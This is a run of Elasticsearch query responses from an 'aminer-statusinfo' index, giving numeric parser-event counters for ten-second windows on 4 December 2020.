{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"bzPvLXYBIkOurnXXuojy","_score":1.0,"_source":{"FromTime":1.607088444216048E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":14,"/parser/model/type_str":3588,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:34.283Z","ToTime":1.607088454216143E9,"fromtimestamp":"2020-12-04T13:27:24.216Z","totimestamp":"2020-12-04T13:27:34.216Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"czPvLXYBIkOurnXX4ogb","_score":1.0,"_source":{"FromTime":1.607088454263898E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":1,"/parser/model/type_str":103,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:44.308Z","ToTime":1.607088464264148E9,"fromtimestamp":"2020-12-04T13:27:34.263Z","totimestamp":"2020-12-04T13:27:44.264Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"eDPwLXYBIkOurnXXDIhj","_score":1.0,"_source":{"FromTime":1.607088465094996E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":26,"/parser/model/type_str":4659,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:55.132Z","ToTime":1.607088475095059E9,"fromtimestamp":"2020-12-04T13:27:45.094Z","totimestamp":"2020-12-04T13:27:55.095Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"fjPwLXYBIkOurnXXM4jZ","_score":1.0,"_source":{"FromTime":1.607088475178856E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":275,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:05.234Z","ToTime":1.607088485178946E9,"fromtimestamp":"2020-12-04T13:27:55.178Z","totimestamp":"2020-12-04T13:28:05.178Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"gjPwLXYBIkOurnXXW4ic","_score":1.0,"_source":{"FromTime":1.607088485375105E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":8,"/parser/model/type_str":1029,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:15.413Z","ToTime":1.607088495375182E9,"fromtimestamp":"2020-12-04T13:28:05.375Z","totimestamp":"2020-12-04T13:28:15.375Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"iDPwLXYBIkOurnXXg4jt","_score":1.0,"_source":{"FromTime":1.607088495696157E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":17,"/parser/model/type_str":1714,"/parser/model/php":0,"/parser/model/status_code":4,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:25.734Z","ToTime":1.607088505696266E9,"fromtimestamp":"2020-12-04T13:28:15.696Z","totimestamp":"2020-12-04T13:28:25.696Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"jDPwLXYBIkOurnXXrIho","_score":1.0,"_source":{"FromTime":1.607088506059213E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":25,"/parser/model/type_str":2004,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:36.097Z","ToTime":1.607088516059322E9,"fromtimestamp":"2020-12-04T13:28:26.059Z","totimestamp":"2020-12-04T13:28:36.059Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"kDPwLXYBIkOurnXX04iY","_score":1.0,"_source":{"FromTime":1.607088516083463E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":1,"/parser/model/type_str":0,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:46.128Z","ToTime":1.607088526083539E9,"fromtimestamp":"2020-12-04T13:28:36.083Z","totimestamp":"2020-12-04T13:28:46.083Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ljPwLXYBIkOurnXX-4gg","_score":1.0,"_source":{"FromTime":1.607088526182068E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":4,"/parser/model/type_str":399,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:56.248Z","ToTime":1.607088536182151E9,"fromtimestamp":"2020-12-04T13:28:46.182Z","totimestamp":"2020-12-04T13:28:56.182Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"mzPxLXYBIkOurnXXJIjl","_score":1.0,"_source":{"FromTime":1.60708853690535E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":12,"/parser/model/type_str":3908,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:06.942Z","ToTime":1.607088546905412E9,"fromtimestamp":"2020-12-04T13:28:56.905Z","totimestamp":"2020-12-04T13:29:06.905Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"oDPxLXYBIkOurnXXTYjD","_score":1.0,"_source":{"FromTime":1.607088547363252E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":9,"/parser/model/type_str":2612,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:17.404Z","ToTime":1.60708855736333E9,"fromtimestamp":"2020-12-04T13:29:07.363Z","totimestamp":"2020-12-04T13:29:17.363Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"pTPxLXYBIkOurnXXdYjw","_score":1.0,"_source":{"FromTime":1.607088557644684E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":18,"/parser/model/type_str":1351,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:27.689Z","ToTime":1.607088567644748E9,"fromtimestamp":"2020-12-04T13:29:17.644Z","totimestamp":"2020-12-04T13:29:27.644Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"qjPxLXYBIkOurnXXnYh6","_score":1.0,"_source":{"FromTime":1.607088567768974E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":450,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:37.811Z","ToTime":1.607088577769054E9,"fromtimestamp":"2020-12-04T13:29:27.768Z","totimestamp":"2020-12-04T13:29:37.769Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"rjPxLXYBIkOurnXXxog0","_score":1.0,"_source":{"FromTime":1.607088578197576E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":14,"/parser/model/type_str":1876,"/parser/model/php":0,"/parser/model/status_code":13,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:48.237Z","ToTime":1.607088588197668E9,"fromtimestamp":"2020-12-04T13:29:38.197Z","totimestamp":"2020-12-04T13:29:48.197Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"tDPxLXYBIkOurnXX7Yjs","_score":1.0,"_source":{"FromTime":1.607088588366563E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":20,"/parser/model/type_str":750,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:58.405Z","ToTime":1.607088598366688E9,"fromtimestamp":"2020-12-04T13:29:48.366Z","totimestamp":"2020-12-04T13:29:58.366Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"uTPyLXYBIkOurnXXFogk","_score":1.0,"_source":{"FromTime":1.607088598649987E9,"StatusInfo":{"/parser/model/classification":1,"/parser/model/event_type_str":18,"/parser/model/type_str":1400,"/parser/model/php":0,"/parser/model/status_code":5,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:08.701Z","ToTime":1.607088608650065E9,"fromtimestamp":"2020-12-04T13:29:58.649Z","totimestamp":"2020-12-04T13:30:08.650Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"vTPyLXYBIkOurnXXPoh2","_score":1.0,"_source":{"FromTime":1.607088608978295E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":87,"/parser/model/type_str":7140,"/parser/model/php":0,"/parser/model/status_code":36,"/parser/model/host":6,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:19.023Z","ToTime":1.60708861897837E9,"fromtimestamp":"2020-12-04T13:30:08.978Z","totimestamp":"2020-12-04T13:30:18.978Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"wzPyLXYBIkOurnXXZohS","_score":1.0,"_source":{"FromTime":1.607088619188115E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":18,"/parser/model/type_str":948,"/parser/model/php":0,"/parser/model/status_code":3,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:29.226Z","ToTime":1.607088629188182E9,"fromtimestamp":"2020-12-04T13:30:19.188Z","totimestamp":"2020-12-04T13:30:29.188Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"xzPyLXYBIkOurnXXj4j4","_score":1.0,"_source":{"FromTime":1.607088629851852E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":33,"/parser/model/type_str":3427,"/parser/model/php":0,"/parser/model/status_code":7,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:39.889Z","ToTime":1.607088639851962E9,"fromtimestamp":"2020-12-04T13:30:29.851Z","totimestamp":"2020-12-04T13:30:39.851Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"zDPyLXYBIkOurnXXuIjH","_score":1.0,"_source":{"FromTime":1.607088640299281E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":10,"/parser/model/type_str":2606,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:30:50.336Z","ToTime":1.607088650299357E9,"fromtimestamp":"2020-12-04T13:30:40.299Z","totimestamp":"2020-12-04T13:30:50.299Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"0TPyLXYBIkOurnXX4Iip","_score":1.0,"_source":{"FromTime":1.607088650508702E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":1037,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:00.546Z","ToTime":1.607088660508778E9,"fromtimestamp":"2020-12-04T13:30:50.508Z","totimestamp":"2020-12-04T13:31:00.508Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"1zPzLXYBIkOurnXXCIiC","_score":1.0,"_source":{"FromTime":1.607088660705171E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":16,"/parser/model/type_str":918,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:10.746Z","ToTime":1.607088670705239E9,"fromtimestamp":"2020-12-04T13:31:00.705Z","totimestamp":"2020-12-04T13:31:10.705Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"2zPzLXYBIkOurnXXMIjN","_score":1.0,"_source":{"FromTime":1.607088671024308E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":25,"/parser/model/type_str":1723,"/parser/model/php":0,"/parser/model/status_code":9,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:21.062Z","ToTime":1.607088681024395E9,"fromtimestamp":"2020-12-04T13:31:11.024Z","totimestamp":"2020-12-04T13:31:21.024Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"4TPzLXYBIkOurnXXWYgr","_score":1.0,"_source":{"FromTime":1.607088681354751E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":17,"/parser/model/type_str":1715,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:31.396Z","ToTime":1.607088691354804E9,"fromtimestamp":"2020-12-04T13:31:21.354Z","totimestamp":"2020-12-04T13:31:31.354Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"5TPzLXYBIkOurnXXgoi1","_score":1.0,"_source":{"FromTime":1.607088691965782E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":24,"/parser/model/type_str":3070,"/parser/model/php":0,"/parser/model/status_code":5,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:42.030Z","ToTime":1.60708870196585E9,"fromtimestamp":"2020-12-04T13:31:31.965Z","totimestamp":"2020-12-04T13:31:41.965Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"6zPzLXYBIkOurnXXq4gV","_score":1.0,"_source":{"FromTime":1.607088702327717E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":18,"/parser/model/type_str":1887,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:52.365Z","ToTime":1.607088712327798E9,"fromtimestamp":"2020-12-04T13:31:42.327Z","totimestamp":"2020-12-04T13:31:52.327Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"7zPzLXYBIkOurnXX0oiK","_score":1.0,"_source":{"FromTime":1.607088712407204E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":1,"/parser/model/type_str":323,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:02.467Z","ToTime":1.607088722407292E9,"fromtimestamp":"2020-12-04T13:31:52.407Z","totimestamp":"2020-12-04T13:32:02.407Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"8zPzLXYBIkOurnXX-ogA","_score":1.0,"_source":{"FromTime":1.607088722502143E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":318,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:12.569Z","ToTime":1.607088732502287E9,"fromtimestamp":"2020-12-04T13:32:02.502Z","totimestamp":"2020-12-04T13:32:12.502Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"-DP0LXYBIkOurnXXF4gX","_score":1.0,"_source":{"FromTime":1.607088729964115E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":3,"/parser/model/type_str":2343,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:20.017Z","ToTime":1.607088739964161E9,"fromtimestamp":"2020-12-04T13:32:09.964Z","totimestamp":"2020-12-04T13:32:19.964Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"_TP0LXYBIkOurnXXQYjJ","_score":1.0,"_source":{"FromTime":1.607088740904546E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":25,"/parser/model/type_str":4933,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:30.946Z","ToTime":1.607088750904612E9,"fromtimestamp":"2020-12-04T13:32:20.904Z","totimestamp":"2020-12-04T13:32:30.904Z","version":"1"}}]}} 